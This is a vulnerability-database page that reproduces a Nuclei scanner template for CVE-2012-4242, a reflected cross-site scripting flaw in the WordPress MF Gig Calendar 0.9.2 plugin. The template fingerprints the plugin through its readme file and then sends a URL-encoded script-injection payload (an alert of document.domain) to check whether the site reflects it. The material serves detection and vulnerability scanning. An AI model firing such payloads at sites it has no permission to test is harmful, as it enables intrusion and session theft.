Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2012-4242
HistoryJul 11, 2021 - 10:06 a.m.

WordPress Plugin MF Gig Calendar 0.9.2 - Cross-Site Scripting

2021-07-1110:06:48
ProjectDiscovery
github.com
3

5.9 Medium

AI Score

Confidence

High

0.002 Low

EPSS

Percentile

59.5%

A cross-site scripting vulnerability in the MF Gig Calendar plugin 0.9.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the query string to the calendar page.

id: CVE-2012-4242

info:
  name: WordPress Plugin MF Gig Calendar 0.9.2 - Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: A cross-site scripting vulnerability in the MF Gig Calendar plugin 0.9.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the query string to the calendar page.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Update to the latest version of the WordPress Plugin MF Gig Calendar to mitigate this vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2012-4242
    - http://www.reactionpenetrationtesting.co.uk/mf-gig-calendar-xss.html
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
    cvss-score: 4.3
    cve-id: CVE-2012-4242
    cwe-id: CWE-79
    epss-score: 0.00216
    epss-percentile: 0.59546
    cpe: cpe:2.3:a:mf_gig_calendar_project:mf_gig_calendar:0.9.2:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: mf_gig_calendar_project
    product: mf_gig_calendar
  tags: cve,cve2012,wordpress,xss,wp-plugin,mf_gig_calendar_project

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/mf-gig-calendar/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - 'MF Gig Calendar ='

  - method: GET
    path:
      - '{{BaseURL}}/?page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</script><script>alert(document.domain)</script>"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100d81a01d9e3a4b64bcfd7aac7508ab474d68b724bba198ed9ff8e04c10bcc4f87022100df8bf6fd589da5ec88074d05bdb388d004d46da2b8dd0bf41c3430b97ececb4b:922c64590222798bb761d5b6d8e72950

5.9 Medium

AI Score

Confidence

High

0.002 Low

EPSS

Percentile

59.5%